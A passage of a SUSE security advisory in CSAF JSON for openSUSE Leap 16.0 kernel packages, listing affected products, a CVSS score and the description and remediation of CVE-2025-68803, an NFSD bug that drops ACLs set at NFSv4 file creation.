"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 3.3,
"baseSeverity": "LOW",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "low"
}
],
"title": "CVE-2025-68802"
},
{
"cve": "CVE-2025-68803",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68803"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSD: NFSv4 file creation neglects setting ACL\n\nAn NFSv4 client that sets an ACL with a named principal during file\ncreation retrieves the ACL afterwards, and finds that it is only a\ndefault ACL (based on the mode bits) and not the ACL that was\nrequested during file creation. This violates RFC 8881 section\n6.4.1.3: \"the ACL attribute is set as given\".\n\nThe issue occurs in nfsd_create_setattr(), which calls\nnfsd_attrs_valid() to determine whether to call nfsd_setattr().\nHowever, nfsd_attrs_valid() checks only for iattr changes and\nsecurity labels, but not POSIX ACLs. When only an ACL is present,\nthe function returns false, nfsd_setattr() is skipped, and the\nPOSIX ACL is never applied to the inode.\n\nSubsequently, when the client retrieves the ACL, the server finds\nno POSIX ACL on the inode and returns one generated from the file\u0027s\nmode bits rather than returning the originally-specified ACL.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68803",
"url": "https://www.suse.com/security/cve/CVE-2025-68803"
},
{
"category": "external",
"summary": "SUSE Bug 1256770 for CVE-2025-68803",
"url": "https://bugzilla.suse.com/1256770"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
